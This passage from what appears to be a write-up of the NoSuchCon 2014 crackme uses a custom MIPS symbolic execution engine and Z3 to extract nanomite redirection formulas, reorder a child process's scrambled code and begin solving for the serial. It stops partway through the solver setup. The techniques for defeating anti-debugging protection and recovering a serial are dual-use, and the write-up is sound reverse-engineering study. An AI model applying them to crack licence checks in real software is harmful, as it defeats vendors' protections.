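    v1 = 0x446F8657             # li    $v1, 0x446F8657
    hi = (v0 * v1) >> 32        # multu $v0, $v1 (high DWORD of the product)
    v1 = hi                     # mfhi  $v1
    v0 = (v0 - v1) & MASK32     # subu  $v0, $v1
    return v0

print('%#.8x' % demo(0xdeadb44))
```

It gives the same 0x98f42d24 as both the symbolic and the emulator modes.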

Of course, I didn't mention a lot of details that still need to be addressed to have something working: simulating data areas, memory layouts, etc. If you are interested in those, you should read the codes in my NoSuchCon2014 folder.

Back into the battlefield

Here comes the important bits!

Extracting the function that generates the magic value from the son program counter

All right, the main objective in this part is to extract the formula that generates the first magic value. As we said earlier, this big block can be seen as a function that takes two arguments (or symbolic variables) and generates the magic DWORD in output. The first thing to do is to copy the code somewhere to feed it to our engine ; I decided to stick all the codes I needed into a separate Python file called code.py.

block_generate_magic_from_pc_son = '''.text:00400B8C                 lw      $v0, 0x318+pc_son($fp)  # Load Word
.text:00400B90                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400B94                 la      $v0, loc_400A78  # Load Address
.text:00400B9C                 lw      $v1, 0x318+tmp_pc($fp)  # Load Word
.text:00400BA0                 subu    $v0, $v1, $v0    # (regs.pc_father - 400A78)
.text:00400BA4                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400BA8                 lw      $v0, 0x318+var_300($fp)  # Load Word
.text:00400BAC                 li      $v1, 0x446F8657  # Load Immediate
.text:00400BB4                 multu   $v0, $v1         # Multiply Unsigned
.text:00400BB8                 mfhi    $v1              # Move From HI
.text:00400BBC                 subu    $v0, $v1         # Subtract Unsigned
[...]
.text:00401424                 lw      $v0, 0x318+var_2F0($fp)  # Load Word
.text:00401428                 nor     $v0, $zero, $v0  # NOR
.text:0040142C                 addiu   $v0, 0x20        # Add Immediate Unsigned
.text:00401430                 lw      $a0, 0x318+tmp_pc($fp)  # Load Word
.text:00401434                 sllv    $v0, $a0, $v0    # Shift Left Logical Variable
.text:00401438                 or      $v0, $v1, $v0    # OR
.text:0040143C                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word'''.split('\n')

Then we have to prepare the environment of our engine: the two symbolic variables are stack-variables, so we have to insert them in the context of our virtual environment. The resulting formula is going to be in $v0 at the end of the execution ; this is the holy grail, the formula we are after.

def extract_equation_of_function_that_generates_magic_value():
  '''Here we do some magic to transform our mini MIPS emulator
  into a symbolic execution engine ; the purpose is to extract
  the formula of the function generating the 32-bits magic value'''

  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_magic_value.log')
  x.debug = False
  x.enable_z3 = True
  pc_son = BitVec('pc_son', 32)
  n_break = BitVec('n_break', 32)
  x.stack['pc_son'] =  pc_son
  x.stack['var_300'] = n_break
  emu_generate_magic_from_son_pc(x, print_final_state = False)
  compute_magic_equation = x.gpr['v0']
  with open(os.path.join('formulas', 'generate_magic_value_from_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_magic_equation, name = 'generate_magic_from_pc_son'))

  return pc_son, n_break, simplify(compute_magic_equation)

You can now keep in memory the formula & wrap this function in another one so that you can reuse it every time you need it:

var_magic, var_n_break, expr_magic = [None]*3
def generate_magic_from_son_pc_using_z3(pc_son, n_break):
  '''Generates the 32 bits magic value thanks to the output
  of the symbolic execution engine: run the analysis once, extract
  the complete equation & reuse it as much as you want'''
  global var_magic, var_n_break, expr_magic
  if var_magic is None and var_n_break is None and expr_magic is None:
    var_magic, var_n_break, expr_magic = extract_equation_of_function_that_generates_magic_value()

  return substitute(
    expr_magic,
    (var_magic, BitVecVal(pc_son, 32)),
    (var_n_break, BitVecVal(n_break, 32))
  ).as_long()

The power of using symbolic variables here lies in the fact that we don't need to run the emulator every single time we call this function; we extract the generic formula once and then just substitute the symbolic variables with the concrete values we want. This comes for free with our code, so let's use it heh :-).

; generate_magic_from_pc_son
(declare-fun n_break () (_ BitVec 32))
(declare-fun pc_son () (_ BitVec 32))
(let ((?x14 (bvadd n_break (bvmul (_ bv4294967295 32) ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))))
(let ((?x21 ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))
(let ((?x8 (bvadd ?x21 (concat (_ bv0 1) ((_ extract 31 1) ?x14)))))
(let ((?x26 ((_ extract 31 6) ?x8)))
(let ((?x24 (bvadd (_ bv32 32) (concat (_ bv63 6) (bvnot ?x26)))))
(let ((?x27 (concat (_ bv0 6) ?x26)))
(let ((?x42 (bvmul (_ bv4294967295 32) ?x27)))
(let ((?x67 ((_ extract 6 6) ?x8)))
(let ((?x120 ((_ extract 7 6) ?x8)))
(let ((?x38 (concat (bvadd (_ bv30088 15) ((_ extract 14 0) pc_son)) ((_ extract 31 15) (bvadd (_ bv4290770312 32) pc_son)))))
(let ((?x41 (bvxor (bvadd (bvor (bvlshr ?x38 (bvadd (_ bv1 32) ?x27)) (bvshl ?x38 ?x24)) ?x42) ?x27)))
(let ((?x63 (bvor ((_ extract 0 0) (bvlshr ?x38 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvshl ?x38 ?x24)))))
(let ((?x56 (concat (bvadd (_ bv1 1) (bvxor (bvadd ?x63 ?x67) ?x67)) ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)))))
(let ((?x66 (concat (bvadd ((_ extract 9 1) (bvadd (_ bv2142377237 32) ?x41)) ((_ extract 14 6) ?x8)) ((_ extract 31 31) (bvadd ?x56 ?x27)) ((_ extract 30 9) (bvadd ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)) (concat (_ bv0 5) ?x26))))))
(let ((?x118 (bvor ((_ extract 1 0) (bvshl ?x66 (bvadd (_ bv1 32) ?x27))) ((_ extract 1 0) (bvlshr ?x66 ?x24)))))
(let ((?x122 (bvnot (bvadd ?x118 ?x120))))
(let ((?x45 (bvadd (bvor (bvshl ?x66 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x66 ?x24)) ?x27)))
(let ((?x76 ((_ extract 4 2) ?x45)))
(let ((?x110 (bvnot ((_ extract 5 5) ?x45))))
(let ((?x55 ((_ extract 8 6) ?x45)))
(let ((?x108 (bvnot ((_ extract 10 9) ?x45))))
(let ((?x78 ((_ extract 13 11) ?x45)))
(let ((?x106 (bvnot ((_ extract 14 14) ?x45))))
(let ((?x80 ((_ extract 15 15) ?x45)))
(let ((?x104 (bvnot ((_ extract 16 16) ?x45))))
(let ((?x123 (concat (bvnot ((_ extract 31 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x50 (concat (bvnot ((_ extract 30 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x91 (bvadd (_ bv1720220585 32) (concat (bvnot (bvadd (_ bv612234822 31) ?x50)) (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) ?x42)))
(let ((?x137 (bvnot (bvadd (_ bv128582 17) (concat ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))))
(let ((?x146 (bvadd (_ bv31657 18) (concat ?x137 (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) (bvmul (_ bv262143 18) ((_ extract 23 6) ?x8)))))
(let ((?x131 (bvadd (_ bv2800103692 32) (concat ?x146 ((_ extract 31 18) ?x91)))))
(let ((?x140 (concat ((_ extract 18 18) ?x91) ((_ extract 31 31) ?x131) (bvnot ((_ extract 30 30) ?x131)) ((_ extract 29 27) ?x131) (bvnot ((_ extract 26 25) ?x131)) ((_ extract 24 24) ?x131) (bvnot ((_ extract 23 22) ?x131)) ((_ extract 21 21) ?x131) (bvnot ((_ extract 20 20) ?x131)) ((_ extract 19 19) ?x131) (bvnot ((_ extract 18 17) ?x131)) ((_ extract 16 14) ?x131) (bvnot ((_ extract 13 9) ?x131)) ((_ extract 8 8) ?x131) (bvnot ((_ extract 7 6) ?x131)) ((_ extract 5 4) ?x131) (bvnot ((_ extract 3 1) ?x131)))))
(let ((?x176 (bvnot (bvadd (concat ((_ extract 4 4) ?x131) (bvnot ((_ extract 3 1) ?x131))) ((_ extract 9 6) ?x8)))))
(let ((?x177 (bvadd (concat ?x176 (bvnot ((_ extract 31 4) (bvadd ?x140 ?x27)))) ?x42)))
(let ((?x187 (bvadd (bvnot ((_ extract 13 4) (bvadd ?x140 ?x27))) (bvmul (_ bv1023 10) ((_ extract 15 6) ?x8)))))
(let ((?x180 (concat (bvadd ((_ extract 23 10) ?x177) (bvmul (_ bv16383 14) ((_ extract 19 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x79 (bvadd (bvxor (bvadd ?x180 ?x27) ?x27) ?x42)))
(let ((?x211 (concat (bvadd ((_ extract 17 10) ?x177) (bvmul (_ bv255 8) ((_ extract 13 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x190 (concat (bvnot (bvadd (bvxor (bvadd ?x211 ?x26) ?x26) (bvmul (_ bv67108863 26) ?x26))) (bvnot ((_ extract 31 26) ?x79)))))
(let ((?x173 (bvadd (bvnot (bvadd (_ bv3113082326 32) ?x190 ?x27)) ?x27)))
(let ((?x174 ((_ extract 9 6) ?x8)))
(let ((?x255 ((_ extract 2 2) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x253 ((_ extract 3 3) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x144 ((_ extract 23 6) ?x8)))
(let ((?x233 ((_ extract 17 6) ?x8)))
(let ((?x235 (bvxor (bvadd ((_ extract 25 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)) ?x233) ?x233)))
(let ((?x244 (bvadd (_ bv122326 18) (concat (bvnot (bvadd ?x235 (bvmul (_ bv4095 12) ?x233))) (bvnot ((_ extract 31 26) ?x79))) ?x144)))
(let ((?x246 (bvadd (bvnot ?x244) ?x144)))
(let ((?x293 (concat (bvnot ((_ extract 24 23) ?x173)) ((_ extract 22 18) ?x173) ((_ extract 17 17) ?x246) (bvnot ((_ extract 16 16) ?x246)) ((_ extract 15 15) ?x246) (bvnot ((_ extract 14 12) ?x246)) ((_ extract 11 10) ?x246) (bvnot ((_ extract 9 9) ?x246)) ((_ extract 8 8) ?x246) (bvnot ((_ extract 7 7) ?x246)) ((_ extract 6 6) ?x246) (bvnot ((_ extract 5 4) ?x246)) (bvnot ?x253) ?x255 (bvnot (bvadd (bvnot (bvadd (_ bv2 2) (bvnot ((_ extract 27 26) ?x79)) ?x120)) ?x120)) (bvnot ((_ extract 31 29) ?x173)) ((_ extract 28 28) ?x173) (bvnot ((_ extract 27 26) ?x173)) ((_ extract 25 25) ?x173))))
(let ((?x324 (bvor ((_ extract 0 0) (bvshl ?x293 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvlshr ?x293 ?x24)))))
(let ((?x202 (bvadd (bvor (bvshl ?x293 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x293 ?x24)) ?x27)))
(let ((?x261 (concat ((_ extract 31 31) ?x202) (bvnot ((_ extract 30 29) ?x202)) ((_ extract 28 27) ?x202) (bvnot ((_ extract 26 25) ?x202)) ((_ extract 24 22) ?x202) (bvnot ((_ extract 21 18) ?x202)) ((_ extract 17 17) ?x202) (bvnot ((_ extract 16 15) ?x202)) ((_ extract 14 13) ?x202) (bvnot ((_ extract 12 12) ?x202)) ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x250 (concat ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x331 (bvadd (_ bv1397077939 32) (concat (bvadd (_ bv4018 12) ?x250) ((_ extract 31 12) (bvadd (_ bv1471406002 32) ?x261))) ?x27)))
(let ((?x264 (bvor (bvshl (bvadd (bvnot ?x331) ?x27) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (bvnot ?x331) ?x27) ?x24))))
(let ((?x298 (bvor (bvshl (bvadd (_ bv1031407080 32) ?x264 ?x42) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (_ bv1031407080 32) ?x264 ?x42) ?x24))))
(let ((?x231 (bvor ((_ extract 31 17) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 17) (bvlshr ?x298 ?x24)))))
(let ((?x220 (bvor ((_ extract 16 0) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 16 0) (bvlshr ?x298 ?x24)))))
(let ((?x283 (bvor (bvshl (concat ?x220 ?x231) (bvadd (_ bv1 32) ?x27)) (bvlshr (concat ?x220 ?x231) ?x24))))
(let ((?x119 (bvadd (_ bv4200859627 32) (bvnot (bvor (bvshl ?x283 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x283 ?x24))))))
(let ((?x201 (bvshl ?x119 ?x24)))
(let ((?x405 (bvadd (bvor ((_ extract 10 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 10 8) ?x201)) ((_ extract 8 6) ?x8))))
(let ((?x343 (concat (bvor ((_ extract 7 0) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 7 0) ?x201)) (bvor ((_ extract 31 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 8) ?x201)))))
(let ((?x199 (bvadd (_ bv752876532 32) (bvnot (bvadd ?x343 ?x27)) ?x27)))
(let ((?x409 (concat ((_ extract 31 29) ?x199) (bvnot ((_ extract 28 28) ?x199)) ((_ extract 27 27) ?x199) (bvnot ((_ extract 26 26) ?x199)) ((_ extract 25 25) ?x199) (bvnot ((_ extract 24 24) ?x199)) ((_ extract 23 23) ?x199) (bvnot ((_ extract 22 22) ?x199)) ((_ extract 21 21) ?x199) (bvnot ((_ extract 20 19) ?x199)) ((_ extract 18 18) ?x199) (bvnot ((_ extract 17 17) ?x199)) ((_ extract 16 16) ?x199) (bvnot ((_ extract 15 15) ?x199)) ((_ extract 14 11) ?x199) (bvnot ((_ extract 10 10) ?x199)) ((_ extract 9 9) ?x199) (bvnot ((_ extract 8 7) ?x199)) ((_ extract 6 6) ?x199) (bvnot ((_ extract 5 4) ?x199)) ((_ extract 3 3) ?x199) (bvnot (bvadd (_ bv4 3) (bvnot ?x405) ((_ extract 8 6) ?x8))))))
(let ((?x342 (bvlshr (bvadd (_ bv330202175 32) ?x409) ?x24)))
(let ((?x20 (bvadd (_ bv1 32) ?x27)))
(let ((?x337 (bvshl (bvadd (_ bv330202175 32) ?x409) ?x20)))
(let ((?x354 (bvadd (_ bv651919116 32) (bvor ?x337 ?x342))))
(let ((?x414 (concat (bvnot ((_ extract 26 26) ?x354)) ((_ extract 25 25) ?x354) (bvnot ((_ extract 24 24) ?x354)) (bvnot ((_ extract 23 23) ?x354)) ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x464 (concat ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x474 (concat (bvadd (_ bv141595581 28) (bvnot (bvxor (bvadd (_ bv178553293 28) ?x464) (concat (_ bv0 2) ?x26)))) ((_ extract 31 28) (bvadd (_ bv4168127421 32) (bvnot (bvxor (bvadd (_ bv2594472397 32) ?x414) ?x27)))))))
(let ((?x495 (bvadd (_ bv1994801052 32) (bvxor (_ bv1407993787 32) (bvor (bvshl ?x474 ?x20) (bvlshr ?x474 ?x24)) ?x27) ?x42)))
(let ((?x392 (concat (bvor ((_ extract 13 0) (bvlshr ?x495 ?x20)) ((_ extract 13 0) (bvshl ?x495 ?x24))) (bvor ((_ extract 31 14) (bvlshr ?x495 ?x20)) ((_ extract 31 14) (bvshl ?x495 ?x24))))))
(let ((?x388 (bvlshr ?x392 ?x24)))
(let ((?x494 (concat (bvnot (bvor ((_ extract 31 31) (bvshl ?x392 ?x20)) ((_ extract 31 31) ?x388))) (bvor ((_ extract 30 30) (bvshl ?x392 ?x20)) ((_ extract 30 30) ?x388)) (bvnot (bvor ((_ extract 29 27) (bvshl ?x392 ?x20)) ((_ extract 29 27) ?x388))) (bvor ((_ extract 26 25) (bvshl ?x392 ?x20)) ((_ extract 26 25) ?x388)) (bvnot (bvor ((_ extract 24 23) (bvshl ?x392 ?x20)) ((_ extract 24 23) ?x388))) (bvor ((_ extract 22 21) (bvshl ?x392 ?x20)) ((_ extract 22 21) ?x388)) (bvnot (bvor ((_ extract 20 16) (bvshl ?x392 ?x20)) ((_ extract 20 16) ?x388))) (bvor ((_ extract 15 15) (bvshl ?x392 ?x20)) ((_ extract 15 15) ?x388)) (bvnot (bvor ((_ extract 14 14) (bvshl ?x392 ?x20)) ((_ extract 14 14) ?x388))) (bvor ((_ extract 13 12) (bvshl ?x392 ?x20)) ((_ extract 13 12) ?x388)) (bvnot (bvor ((_ extract 11 10) (bvshl ?x392 ?x20)) ((_ extract 11 10) ?x388))) (bvor ((_ extract 9 8) (bvshl ?x392 ?x20)) ((_ extract 9 8) ?x388)) (bvnot (bvor ((_ extract 7 2) (bvshl ?x392 ?x20)) ((_ extract 7 2) ?x388))) (bvor ((_ extract 1 1) (bvshl ?x392 ?x20)) ((_ extract 1 1) ?x388)) (bvnot (bvor ((_ extract 0 0) (bvshl ?x392 ?x20)) ((_ extract 0 0) ?x388))))))
(let ((?x450 (bvor (bvlshr ?x494 ?x20) (bvshl ?x494 ?x24))))
(bvor (bvlshr ?x450 ?x20) (bvshl ?x450 ?x24)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Quite happy we don't have to study that, right?
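That said, the first few bindings are recognizable without studying the rest: ?x21, ?x14, ?x8 and ?x26 look like the classic multiply-by-magic-constant sequence a compiler emits for an unsigned division by 101, which would make ?x27 the round number n_break / 101. The sketch below mirrors those four bindings with plain Python integers so the reading can be checked; the helper name is mine and is not part of the original scripts.

```python
MASK32 = 0xffffffff
MAGIC_101 = 1148159575  # the (_ bv1148159575 64) constant from the formula

def div101_like_formula(n_break):
    '''Mirror ?x21, ?x14, ?x8 and ?x26 on a concrete 32-bit value.'''
    hi = ((MAGIC_101 * n_break) >> 32) & MASK32  # ?x21: high dword of the 64-bit product
    diff = (n_break - hi) & MASK32               # ?x14: n_break - hi
    total = (hi + (diff >> 1)) & MASK32          # ?x8:  hi + (diff >> 1)
    return total >> 6                            # ?x26, zero-extended as ?x27

# Compare against Python's own floor division on a few values
checked = all(div101_like_formula(n) == n // 101 for n in range(0, 5000))
```

If that reading is right, ?x24 works out to 31 - ?x27, so every (bvor (bvlshr x (1 + ?x27)) (bvshl x ?x24)) pair in the dump is a 32-bit rotation by ?x27 + 1 bits.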

Extracting the function that generates the new program counter from the second magic value

For the second big block of code, we can do exactly the same thing: copy the code, configure the virtual environment with our symbolic variables and wrap the function:

def extract_equation_of_function_that_generates_new_son_pc():
  '''Extract the formula of the function generating the new son's $pc'''
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_new_son_pc.log')
  x.debug = False
  x.enable_z3 = True
  tmp_pc = BitVec('magic', 32)
  n_loop = BitVec('n_loop', 32)
  x.stack['tmp_pc'] = tmp_pc
  x.stack['var_2F0'] = n_loop
  emu_generate_new_pc_for_son(x, print_final_state = False)
  compute_pc_equation = simplify(x.gpr['v0'])
  with open(os.path.join('formulas', 'generate_new_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_pc_equation, name = 'generate_new_pc_son'))

  return tmp_pc, n_loop, compute_pc_equation

var_new_pc, var_n_loop, expr_new_pc = [None]*3
def generate_new_pc_from_magic_high(magic_high, n_loop):
  global var_new_pc, var_n_loop, expr_new_pc
  if var_new_pc is None and var_n_loop is None and expr_new_pc is None:
    var_new_pc, var_n_loop, expr_new_pc = extract_equation_of_function_that_generates_new_son_pc()

  return substitute(
      expr_new_pc,
      (var_new_pc, BitVecVal(magic_high, 32)),
      (var_n_loop, BitVecVal(n_loop, 32))
  ).as_long()

If you are interested in what the formula looks like, it is also available in the NoSuchCon2014 folder on my github.

Putting it all together: building a function that computes the new program counter of the son

Obviously, we don't really care about those two previous functions on their own; we just want to combine them to compute the new program counter from both the round number & where the son SIGTRAP'd. The only missing bit is the lookup in the QWORDs array to extract the second magic value. We just have to dump the array inside another file called memory.py. This is done with a simple IDA Python one-liner:

values = dict((0x00414130+i*8, Qword(0x00414130+i*8)) for i in range(0x25E))

Now, we can build the whole function easily by combining all those pieces:

def generate_new_pc_from_pc_son_using_z3(pc_son, n_break):
  '''Generate the new program counter from the address where the son SIGTRAP'd and
  the number of SIGTRAP the son encountered'''
  loop_n = n_break // 101  # explicit integer division: the round number
  magic = generate_magic_from_son_pc_using_z3(pc_son, n_break)
  idx = None
  for i in range(len(memory.pcs)):
    if (memory.pcs[i] & 0xffffffff) == magic:
      idx = i
      break

  assert idx is not None
  return generate_new_pc_from_magic_high(memory.pcs[idx] >> 32, loop_n)
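The content of memory.py is not shown here, so the following is only a sketch under assumptions: it supposes the dump is an {address: qword} dictionary like the one produced by the IDA one-liner, and that memory.pcs is the list of those QWORDs in address order. The helper names and the three entries are made up for illustration. It also shows how the linear search could be replaced by a dictionary keyed on the low DWORD.

```python
def build_pcs(values):
    '''Turn an {address: qword} dump into a list ordered by address.'''
    return [values[addr] for addr in sorted(values)]

def build_low_to_high_index(pcs):
    '''Map the low dword (first magic value) to the high dword (second one).'''
    index = {}
    for qword in pcs:
        # setdefault keeps the first match, like the linear search does
        index.setdefault(qword & 0xffffffff, qword >> 32)
    return index

# Made-up entries, only here to exercise the helpers
toy_values = {
    0x00414138: 0xBBBBBBBB22222222,
    0x00414130: 0xAAAAAAAA11111111,
    0x00414140: 0xCCCCCCCC33333333,
}
toy_pcs = build_pcs(toy_values)
toy_index = build_low_to_high_index(toy_pcs)
second_magic = toy_index[0x22222222]  # high dword paired with that low dword
```

With such an index, the for loop above becomes a single dictionary access, which matters little for 606 entries but keeps the intent obvious.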

Sweet. Really sweet.

This basically means we are now able to unscramble the code of the son and reorder it completely, without even running the binary or generating traces.

Unscramble the code like a sir

Before showing the code, I just want to explain the process one more time:

  1. The son executes some code until it reaches a break instruction
  2. The father gets the $pc of the son and the variable that counts the number of break instructions the son executed
  3. The father generates a new $pc value from those two variables
  4. The father sets the new $pc
  5. The father continues its son
  6. Goto 1!

So basically to unscramble the code, we just need to simulate what the father would do & log everything somewhere. Couple of important details though:

  • There are exactly 101 break instructions in the son, so 101 chunks of code will be executed and need to be reordered,
  • The son is executing 6 rounds ; that's exactly why the QWORD array has 6*101 entries.

Here is the function I used:

def generate_son_code_reordered(debug = False):
    '''This function puts the son's blocks of code in the right order without
    relying on the father to set a new $pc value when a break is executed in the son.
    With this output we are good to go to create a nanomites-less binary:
      - We don't need the father anymore (he was driving the son)
      - We have the code in the right order, so we can also remove the break instructions
    It will also be quite useful when we want to execute its code symbolically.
    '''
    def parse_line(l):
        addr_seg, instr, _ = l.split(None, 2)
        _, addr = addr_seg.split(':')
        return int('0x%s' % addr, 0), instr

    son_code = code.block_code_of_son
    next_break = 0
    n_break = 0
    cleaned_code = []
    for _ in range(6):
        for z in range(101):
            i = 0
            while i < len(son_code):
                line = son_code[i]
                addr, instr = parse_line(line)
                if instr == 'break' and (next_break == addr or z == 0):
                    break_addr = addr
                    new_pc = generate_new_pc_from_pc_son_using_z3(break_addr, n_break)
                    n_break += 1
                    if debug:
                        print '; Found the %dth break (@%.8x) ; new pc will be %.8x' % (z, break_addr, new_pc)
                    state = 'Begin'
                    block = []
                    j = 0
                    while j < len(son_code):
                        line = son_code[j]
                        addr, instr = parse_line(line)
                        if state == 'Begin':
                            if addr == new_pc:
                                block.append(line)
                                state = 'Log'
                        elif state == 'Log':
                            if instr == 'break':
                                next_break = addr
                                state = 'End'
                            else:
                                block.append(line)
                        elif state == 'End':
                            break
                        else:
                            pass
                        j += 1

                    if debug:
                        print ';', '='*25, 'BLOCK %d' % z, '='*25
                        print '\n'.join(block)
                    cleaned_code.extend(block)
                    break
                i += 1

    return cleaned_code

And there it is :-)

The function outputs the unrolled and ordered code of the son. If you want to push further, you could theoretically perform an open-heart surgery to completely remove the nanomites from the original binary, isn't it cool? This is left as an exercise for the interested reader though :-)).
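To make the idea easier to see without the parsing details, here is a stripped-down sketch of the same walk. It assumes the son's code has already been split into a dictionary mapping each block's start address to its instructions and to the address of the break that ends it; next_pc stands in for the father's computation. All names and values below are hypothetical.

```python
def reorder_blocks(blocks, first_break, next_pc, n_breaks):
    '''blocks maps a start address to (instructions, address of the closing break).
    next_pc(break_addr, n_break) plays the role of the father.'''
    ordered = []
    break_addr = first_break
    for n_break in range(n_breaks):
        start = next_pc(break_addr, n_break)      # where the father sends the son
        instructions, break_addr = blocks[start]  # run until the next break
        ordered.extend(instructions)
    return ordered

# Toy program: three blocks stored out of order (made-up addresses)
toy_blocks = {
    0x10: (['B1', 'B2'], 0x18),
    0x20: (['C1'], 0x24),
    0x30: (['A1'], 0x34),
}
toy_jumps = {0x0c: 0x30, 0x34: 0x10, 0x18: 0x20}

def toy_next_pc(break_addr, n_break):
    # The real father also uses n_break; this toy version ignores it
    return toy_jumps[break_addr]

toy_result = reorder_blocks(toy_blocks, 0x0c, toy_next_pc, 3)
```

For the real binary, n_breaks would be 6 * 101 and next_pc would be generate_new_pc_from_pc_son_using_z3.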

Attacking the son: the last man standing

Now that we have the code unscrambled, we can directly feed it to our engine but before doing so here are some details:

  • As we said earlier, it looks like the son is executing the same code 6 times. This is not the case at all: every round executes the same number of instructions, but not in the same order
  • The computations executed can be seen as some kind of light encoding/encryption or decoding/decryption algorithm
  • We have 6 rounds because the input serial is broken into 6 DWORDs (so 6 symbolic variables) ; so basically each round is going to generate an output DWORD

As previously, we need to copy the code we want to execute. Note that we can also use generate_son_code_reordered to generate it dynamically. The next step is to configure the virtual environment, and then we are finally good to run the code:

def get_serial():
  print '> Instantiating the symbolic execution engine..'
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('decrypt_serial.log')
  x.enable_z3 = True

  print '> Generating dynamically the code of the son & reorganizing/cleaning it..'
  # If you don't want to generate it dynamically like a sir, I've copied a version inside
  # code.block_code_of_son_reorganized_loop_unrolled :-)
  x.code = generate_son_code_reordered()

  print '> Configuring the virtual environement..'
  x.gpr['fp'] = 0x7fff6cb0
  x.stack_offsets['var_30'] = 24
  start_addr = x.gpr['fp'] + x.stack_offsets['var_30'] + 8
  # (gdb) x/6dwx $s8+24+8
  # 0x7fff6cd0:     0x11111111      0x11111111      0x11111111
  #                 0x11111111      0x11111111      0x11111111
  a, b, c, d, e, f = BitVecs('a b c d e f', 32)
  x.mem[start_addr +  0] = a
  x.mem[start_addr +  4] = b
  x.mem[start_addr +  8] = c
  x.mem[start_addr + 12] = d
  x.mem[start_addr + 16] = e
  x.mem[start_addr + 20] = f

  print '> Running the code..'
  x.run()

The thing that matters this time is to find a, b, c, d, e, f so that they generate specific outputs ; so this is where Z3 is going to help us a lot. Thanks to that guy we don't need to manually invert the algorithm.

The final bit now is basically just about setting up the solver, setting the correct constraints and generating the serial you guys have been waiting for so long:

print '> Instantiating & configuring the solver..'
s = Solver()
s.add(
  x.mem[start_addr +   0] == 0x7953205b, x.mem[start_addr +   4] == 0x6b63616e,
